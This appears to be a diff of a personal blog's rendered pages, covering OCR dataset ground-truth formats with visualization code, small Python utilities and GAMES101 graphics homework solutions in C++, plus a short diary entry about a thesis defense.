The corresponding ground truth, gt_img_1.txt. Each line gives the two corner points of an axis-aligned box followed by the quoted transcription:

38, 43, 920, 215, "Tiredness"
275, 264, 665, 450, "kills"
0, 699, 77, 830, "A"
128, 705, 483, 839, "short"
542, 710, 938, 841, "break"
87, 884, 457, 1021, "could"
517, 919, 831, 1024, "save"
166, 1095, 468, 1231, "your"
530, 1069, 743, 1206, "life"

Visualization code for the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 1

image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1][2:-2]  # strip the quotes and newline
    points = np.array([(coords[i], coords[i + 1]) for i in range(0, len(coords), 2)])
    cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)),
                cv2.FONT_HERSHEY_SIMPLEX, min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()


            Task 2.2: Text Segmentation (2013 edition)

The dataset is the same as Task 2.1, except the ground truth consists of segmentation masks such as gt_img_1.png.

            @@ -536,7 +534,7 @@

            word_1.png

The corresponding line in the ground-truth file gt.txt:

word_1.png, "PROPER"

            Task 2.4: End to End (2015 edition)

It seems the network is asked to recognize the words outright, with a lexicon (word list) provided.

            @@ -559,11 +557,11 @@

            img_2.jpg

The corresponding ground truth, gt_img_2.txt. Each line gives the four corner points of a quadrilateral followed by the transcription; ### marks text treated as unreadable:

790,302,903,304,902,335,790,335,JOINT
822,288,872,286,871,298,823,300,yourself
641,138,657,139,657,151,641,151,###
669,139,693,140,693,154,669,153,154
700,141,723,142,723,155,701,154,197
637,101,721,106,722,115,637,110,###
668,157,693,158,693,170,668,170,727
636,155,661,156,662,169,636,168,198
660,82,700,85,700,99,660,96,20029
925,252,973,254,973,262,925,262,###
789,284,818,284,818,297,789,297,Free
875,286,902,289,903,298,875,298,from
791,337,863,337,863,364,791,364,PAIN
794,445,818,445,818,473,794,473,###
922,440,962,442,963,462,922,463,###
924,476,967,476,968,489,924,491,###
924,505,962,506,965,518,923,519,###
847,524,887,524,887,555,847,555,###
791,474,822,474,822,500,791,500,###
780,582,910,576,909,583,780,588,###
854,456,902,455,902,465,854,467,###
854,467,903,467,903,480,854,480,###

Visualization code for the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 463

image_dir = r'XXX/ICDAR_2015/test_img/'
label_dir = r'XXX/ICDAR_2015/test_gt/'

image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1]
    points = np.array([(coords[i], coords[i + 1]) for i in range(0, len(coords), 2)])
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)  # quadrilateral, not a box
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)),
                cv2.FONT_HERSHEY_SIMPLEX, min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()


1111,459,1266,495,1259,586,1104,550,FESTIVE
1100,523,1261,603,1244,719,1083,639,SALE

            Task 4.2: Text Segmentation (N/A)

Not available.

            Task 4.3: Word Recognition (2015 edition)
            @@ -576,7 +574,7 @@

            word_10.png

The corresponding line in Challenge4_Test_Task3_GT.txt:

word_10.png, "PAIN"

            Task 4.4: End to End (2015 edition)

Emmmm, this feels like just a combination of the earlier tasks, plus a vocabulary list.

              @@ -603,10 +601,10 @@

              image_0.jpg

The corresponding ground truth, image_0.txt.

Each line: bounding box, whether the text is recognizable, and the corresponding text:

390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
125,2270,180,2270,180,2288,125,2288,1,"###"
106,2297,160,2297,160,2316,106,2316,1,"###"
22,2363,82,2363,82,2383,22,2383,1,"###"
524,2511,837,2511,837,2554,524,2554,1,"###"
455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"
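A minimal parsing sketch for lines of this form (an assumption drawn from the examples above: eight corner coordinates, then a 0/1 legibility flag, then the quoted transcription, which may itself contain commas):

def parse_line(line):
    parts = line.strip().split(',')
    coords = list(map(int, parts[:8]))        # four corner points
    illegible = parts[8] == '1'               # 1 marks (partially) illegible text
    text = ','.join(parts[9:]).strip('"')     # transcription, quotes removed
    return coords, illegible, text

print(parse_line('390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"'))
# ([390, 902, 1856, 902, 1856, 1225, 390, 1225], False, '金氏眼镜')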

              Total-Text

Resources: Total-Text Dataset | Papers With Code

A dataset of curved text:

              @@ -637,39 +635,39 @@

              TextSeg

The corresponding per-character segmentation mask under bpoly_label/, a00001_mask.png:


The JSON file a00001_anno.json:

{
  "0000": {
    "text": "WHY",
    "bbox": [300, 264, 799, 264, 799, 521, 300, 521],
    "char": {
      "00": {"text": "W", "bbox": [304, 270, 519, 270, 519, 517, 304, 517], "mask_value": 1},
      "01": {"text": "H", "bbox": [514, 278, 650, 278, 650, 521, 514, 521], "mask_value": 2},
      "02": {"text": "Y", "bbox": [651, 272, 800, 272, 800, 521, 651, 521], "mask_value": 3}
    }
  },
  "0001": {
    "text": "ME?",
    "bbox": [334, 514, 762, 514, 762, 764, 334, 764],
    "char": {
      "00": {"text": "M", "bbox": [336, 513, 518, 513, 518, 761, 336, 761], "mask_value": 4},
      "01": {"text": "E", "bbox": [514, 514, 639, 514, 639, 761, 514, 761], "mask_value": 5},
      "02": {"text": "?", "bbox": [637, 517, 758, 517, 758, 762, 637, 762], "mask_value": 6}
    }
  }
}
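A small sketch of how the mask_value fields tie the JSON to the per-character mask image (assuming Pillow and NumPy; the file paths and the integer-label mask encoding are as described above):

import json

import numpy as np
from PIL import Image

with open("a00001_anno.json", encoding="utf-8") as f:
    anno = json.load(f)

# Every character owns one integer label in the per-character mask image
mask = np.array(Image.open("a00001_mask.png"))

for word in anno.values():
    for ch in word["char"].values():
        pixels = int((mask == ch["mask_value"]).sum())  # pixel count of this character
        print(word["text"], ch["text"], ch["mask_value"], pixels)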

The segmentation map a00001_maskfg.png under semantic_label/

              webp

              a00001_maskfg.png

              CTW 1500

- [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…/…/…/…/2023/07/14/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)
+ [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…//Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)

Synthetic Datasets

              SynthText

- [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/04/21/Paper-Synthetic Data for Text Localisation in Natural Images/)
+ [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-Synthetic Data for Text Localisation in Natural Images/)

- [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/09/05/Paper-重读-Synthetic Data for Text Localisation in Natural Images/)
+ [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

              VISD

- [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…/…/…/…/2023/08/25/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)
+ [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…//Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)

              SynthText3D

- [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…/…/…/…/2023/09/12/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)
+ [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…//Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)

              UnrealText

Plan-对论文的目前想法-Zi-Zi’s Journey

- [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…/…/…/…/2023/05/23/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)
+ [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…//Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)

              @@ -889,6 +887,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" "b/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" index d28a06b08b..5c44669974 100644 --- "a/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" +++ "b/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" @@ -44,8 +44,6 @@ - - @@ -419,7 +417,7 @@

              前言


Baoding weather report:

import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime, timedelta  # timedelta was missing from the original import

# Use Seaborn's darkgrid style
sns.set_style("darkgrid")

# x-axis dates
x = []
for i in range(14):
    x.append(datetime(2023, 9, 4) + timedelta(days=i))

# y-axis data (temperatures and PM values)
y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19]  # daily low
y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31]  # daily high
y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63]  # daily PM value

# Create the figure and the first axis
fig, ax1 = plt.subplots()

# First y-axis: temperature
ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
ax1.plot(x, y2, label='Max Temperature', color='tab:red')
ax1.set_xlabel('Date')
ax1.set_ylabel('Temperature (°C)')
ax1.tick_params(axis='y')

# Second axis sharing the x-axis
ax2 = ax1.twinx()
# Format the x-axis dates, keeping only the day
formatted_dates = [date.strftime('%d') for date in x]

# Set x-axis ticks and labels
ax1.set_xticks(x)
ax1.set_xticklabels(formatted_dates)

# Second y-axis: PM value
ax2.plot(x, y3, label='PM Value', color='tab:green')
ax2.set_ylabel('PM Value')
ax2.tick_params(axis='y')

# Annotate each data point
for i, val in enumerate(y1):
    ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0, 10), ha='center')

for i, val in enumerate(y2):
    ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0, 10), ha='center')

for i, val in enumerate(y3):
    ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0, -15), ha='center')

# Combined legend for both axes
lines = ax1.get_lines() + ax2.get_lines()
plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

# Title
plt.title('Temperature and PM Value')

# Show the figure
plt.show()

              png


Parasol trees and ginkgoes:

              @@ -4611,6 +4609,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-10-\345\200\222\344\270\200/index.html" "b/posts/Diary-10-\345\200\222\344\270\200/index.html" index 2b6a94ec86..d3d636cd0f 100644 --- "a/posts/Diary-10-\345\200\222\344\270\200/index.html" +++ "b/posts/Diary-10-\345\200\222\344\270\200/index.html" @@ -51,8 +51,6 @@ - - @@ -418,12 +416,12 @@

              Diary-10-倒一

              @@ -4515,6 +4513,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" "b/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" index 31aec0e90a..4f7d1f0631 100644 --- "a/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" +++ "b/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" @@ -54,8 +54,6 @@ - - @@ -483,7 +481,7 @@

              6.2

Although my advisor had said beforehand that all the committee members were given a heads-up, one professor still raised some fairly pointed questions at the defense; some professors barely asked about the technical side of the theses and instead turned into Leeuwenhoeks, nitpicking the formatting; another professor even arrived late. Unbelievable. Midway through, after a senior student finished presenting his work, the professor questioning him never realized she had picked up the wrong thesis. Hilarious.

After watching the first half, I left. In the end it was all a formality and everyone passed.

              bbtime

              - +
            @@ -2158,6 +2156,8 @@

            Diary-暑假!

            + + @@ -2173,8 +2173,6 @@

            Diary-暑假!

            - - @@ -4308,6 +4306,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" "b/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" index f89ce9361e..604b986d2a 100644 --- "a/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" +++ "b/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -409,7 +407,7 @@

            Diary-暑期图集(7 月)


import os   # file and directory handling
import sys  # command-line arguments (unused here)
from PIL import Image  # image processing

def convert_to_webp(input_file, output_file, quality=80):
    # Convert a single image file.
    # input_file: path of the input image
    # output_file: path of the output webp file
    # quality: webp quality, range 1-100, default 80
    try:
        # Open the input image
        with Image.open(input_file) as im:
            # Save it in webp format
            im.save(output_file, "webp", quality=quality)
        print(f"Converted: {input_file} => {output_file}")
    except Exception as e:
        # Report conversion failures
        print(f"Error converting file: {input_file}")
        print(str(e))

def process_folder(folder_path):
    # Walk the whole folder tree
    for root, dirs, files in os.walk(folder_path):
        for filename in files:
            # Only handle jpg/jpeg/png files
            if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
                input_file = os.path.join(root, filename)
                output_file = os.path.splitext(input_file)[0] + ".webp"
                # Convert this file
                convert_to_webp(input_file, output_file)

if __name__ == "__main__":
    # Root folder to process
    folder_path = r"D:\XXX"
    process_folder(folder_path)

To keep page loads fast, I decided to convert all of the post images from jpg to the smaller webp format[1]
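One practical caveat: this only works if the installed Pillow build includes WebP support, which can be checked before running the batch job:

from PIL import features

# Prints True if this Pillow build can read and write WebP
print(features.check("webp"))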

This is the main text.

          06:57 京畿之门

          @@ -4883,6 +4881,8 @@

          目录

          var highlightShrink = "true"; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" "b/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" index a9a3e521ce..7c2402bc6f 100644 --- "a/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" +++ "b/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" @@ -44,8 +44,6 @@ - - @@ -4632,6 +4630,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" "b/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" index 4c98986ba6..b91b3991c4 100644 --- "a/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" +++ "b/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" @@ -44,8 +44,6 @@ - - @@ -4676,6 +4674,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" "b/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" index 70beb4aa5e..4f7035bec8 100644 --- "a/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" +++ "b/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" @@ -51,8 +51,6 @@ - - @@ -422,12 +420,12 @@

          Diary-赣了,又又闽了(一)

Write a compile.sh to make building easier:

rm -rf build
mkdir build
cd build
cmake ..
make
./Transformation
cd ../

Make it executable:

chmod a+x compile.sh

Run it!

sh compile.sh

Assignment

Write a shell script for building the assignment:

rm -rf build
mkdir build
cd build
cmake ..
make -j4
cd ../

Example code

#include <cmath>
#include <eigen3/Eigen/Core>
#include <eigen3/Eigen/Dense>
#include <iostream>

int main() {
    // Basic Example of cpp
    std::cout << "Example of cpp \n";
    float a = 1.0, b = 2.0;
    std::cout << a << std::endl;
    std::cout << a / b << std::endl;
    std::cout << std::sqrt(b) << std::endl;
    std::cout << std::acos(-1) << std::endl;
    std::cout << std::sin(30.0 / 180.0 * acos(-1)) << std::endl;

    // Example of vector
    std::cout << "Example of vector \n";
    // vector definition
    Eigen::Vector3f v(1.0f, 2.0f, 3.0f);
    Eigen::Vector3f w(1.0f, 0.0f, 0.0f);
    // vector output
    std::cout << "Example of output \n";
    std::cout << v << std::endl;
    // vector add
    std::cout << "Example of add \n";
    std::cout << v + w << std::endl;
    // vector scalar multiply
    std::cout << "Example of scalar multiply \n";
    std::cout << v * 3.0f << std::endl;
    std::cout << 2.0f * v << std::endl;

    // Example of matrix
    std::cout << "Example of matrix \n";
    // matrix definition
    Eigen::Matrix3f i, j;
    i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
    j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
    // matrix output
    std::cout << "Example of output \n";
    std::cout << i << std::endl;
    // matrix add i + j
    // matrix scalar multiply i * 2.0
    // matrix multiply i * j
    // matrix multiply vector i * v

    return 0;
}

Problem

Given a point $P=(2,1)$, rotate it counterclockwise about the origin by $45^\circ$, then translate it by $(1, 2)$, and compute the transformed coordinates.
        @@ -1095,8 +1093,8 @@

        HW0

The rotation matrix is $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\ \sin \pi/4 & \cos \pi/4 & 0 \\ 0 & 0 & 1 \end{bmatrix}$

The translation matrix is $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \\ 0 & 1 & 2 \\ 0 & 0 & 1\end{bmatrix}$

The final coordinates are given by $TRP$.

#include <cmath>
#include <eigen3/Eigen/Core>
#include <eigen3/Eigen/Dense>
#include <iostream>
#define PI 3.1415926535
using namespace std;
using namespace Eigen;

int main()
{
    float theta = PI / 4.0f;
    Vector3f P(2.0f, 1.0f, 1.0f);
    Matrix3f R, T;
    R <<
        cos(theta), -sin(theta), 0,
        sin(theta), cos(theta), 0,
        0, 0, 1;
    T <<
        1, 0, 1,
        0, 1, 2,
        0, 0, 1;
    cout << T * R * P << endl;
    return 0;
}

Output:

1.70711
4.12132
1
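As a quick sanity check on the printed result, carrying out the multiplication by hand:

$$RP=\begin{bmatrix}\frac{\sqrt2}{2}&-\frac{\sqrt2}{2}&0\\ \frac{\sqrt2}{2}&\frac{\sqrt2}{2}&0\\ 0&0&1\end{bmatrix}\begin{bmatrix}2\\1\\1\end{bmatrix}=\begin{bmatrix}\frac{\sqrt2}{2}\\ \frac{3\sqrt2}{2}\\ 1\end{bmatrix}\approx\begin{bmatrix}0.70711\\2.12132\\1\end{bmatrix},\qquad TRP\approx\begin{bmatrix}0.70711+1\\2.12132+2\\1\end{bmatrix}=\begin{bmatrix}1.70711\\4.12132\\1\end{bmatrix}$$

which matches the program output.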

        HW1

The task in this assignment is to fill in a rotation matrix and a perspective projection matrix. Given three 3D points $v_0(2.0, 0.0, −2.0)$, $v_1(0.0, 2.0, −2.0)$, $v_2(−2.0, 0.0, −2.0)$, you need to transform their coordinates into screen coordinates and draw the corresponding wireframe triangle on screen (the code framework already provides the draw_triangle function, so you only need to build the transformation matrices).

        @@ -1105,7 +1103,7 @@

        HW1

• get_model_matrix(float rotation_angle): build the model transformation matrix element by element and return it.

Plug in the formula: $$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\ \sin\alpha&\cos\alpha&0&0\\ 0&0&1&0\\ 0&0&0&1\end{pmatrix}$$

Eigen::Matrix4f get_model_matrix(float rotation_angle)
{
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the model matrix for rotating the triangle around the Z axis.
    // Then return it.

    float angle = rotation_angle * MY_PI / 180.0f;

    Eigen::Matrix4f translate;
    translate << std::cos(angle), -std::sin(angle), 0, 0,
        std::sin(angle), std::cos(angle), 0, 0,
        0, 0, 1, 0,
        0, 0, 0, 1;
    model = translate * model;
    return model;
}
• get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): use the given parameters to build the perspective projection matrix element by element and return it.
      @@ -1118,11 +1116,11 @@

      HW1

      png

Concretely, as in the figure above, zNear is $n$, zFar is $f$, and $\frac{y}{z}=\tan(\mathrm{eye\_fov}/2)$.

Since $n$ and $f$ are negative in a right-handed coordinate system:

float angle = eye_fov * MY_PI / 180.0f;
float n = -zNear;
float f = -zFar;
float t = std::tan(angle / 2) * n;
float b = -t;
float r = t * aspect_ratio;
float l = -r;

Finally, $M_{persp}=M_{ortho}M_{persp\to ortho}$ is the matrix we need.
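For reference, the standard factors behind this composition, written in terms of the $n$, $f$, $t$, $b$, $r$, $l$ computed above (the implementation below builds them as M_P, M_S, and M_T, with zNear/zFar in place of $n$, $f$ inside M_P):

$$M_{persp\to ortho}=\begin{pmatrix}n&0&0&0\\ 0&n&0&0\\ 0&0&n+f&-nf\\ 0&0&1&0\end{pmatrix},\qquad M_{ortho}=\underbrace{\begin{pmatrix}\frac{2}{r-l}&0&0&0\\ 0&\frac{2}{t-b}&0&0\\ 0&0&\frac{2}{f-n}&0\\ 0&0&0&1\end{pmatrix}}_{\text{scale}}\underbrace{\begin{pmatrix}1&0&0&-\frac{r+l}{2}\\ 0&1&0&-\frac{t+b}{2}\\ 0&0&1&-\frac{n+f}{2}\\ 0&0&0&1\end{pmatrix}}_{\text{translate}}$$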

Full code:

Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
                                      float zNear, float zFar)
{
    // Students will implement this function

    Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the projection matrix for the given parameters.
    // Then return it.

    Eigen::Matrix4f M_P;
    M_P << zNear, 0, 0, 0,
        0, zNear, 0, 0,
        0, 0, zNear + zFar, -(zNear * zFar),
        0, 0, 1, 0;

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    Eigen::Matrix4f M_T;
    M_T << 1, 0, 0, -(r + l) / 2,
        0, 1, 0, -(t + b) / 2,
        0, 0, 1, -(n + f) / 2,
        0, 0, 0, 1;

    Eigen::Matrix4f M_S;
    M_S << 2 / (r - l), 0, 0, 0,
        0, 2 / (t - b), 0, 0,
        0, 0, 2 / (f - n), 0,
        0, 0, 0, 1;

    projection = M_T * M_S * M_P * projection;
    return projection;
}

At runtime:

      • n = -0.1
      • @@ -1136,7 +1134,7 @@

        HW1

Bonus: write a function in main.cpp that returns the rotation transformation matrix about an arbitrary axis through the origin: Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

Plug in Rodrigues' rotation formula: $$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\\ n_z&0&-n_x\\ -n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
{
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    float alpha = angle * MY_PI / 180.0f;
    float nx = axis[0];
    float ny = axis[1];
    float nz = axis[2];
    Eigen::Matrix3f M;  // the cross-product matrix N of the (assumed unit-length) axis
    M <<
        0, -nz, ny,
        nz, 0, -nx,
        -ny, nx, 0;
    Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
    Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
    translate.block<3, 3>(0, 0) = R;

    model = translate * model;
    return model;
}
        @@ -5079,6 +5077,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" index 8708c216f7..fa0c812a74 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -631,7 +629,7 @@

for (int x = 0; x < xmax; ++x)
    output[x] = f(x);

        Sampling is a core idea in graphics.

        We sample time (1D), area (2D), direction (2D), volume (3D) …

        @@ -639,7 +637,7 @@

for (int x = 0; x < xmax; ++x)
    for (int y = 0; y < ymax; ++y)
        image[x][y] = inside(tri, x + 0.5, y + 0.5);

Decide whether to shade each pixel by testing whether its center lies inside the triangle.

        Inside? Recall: Three Cross Products!

Whether a pixel lies inside the triangle can be tested with vector cross products.

        @@ -937,7 +935,7 @@

        HW2


rasterize_triangle(): performs the triangle rasterization algorithm

//Screen space rasterization
void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();
    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) // bounding-box extents
    {
        if (point[0] < min_x) min_x = point[0];
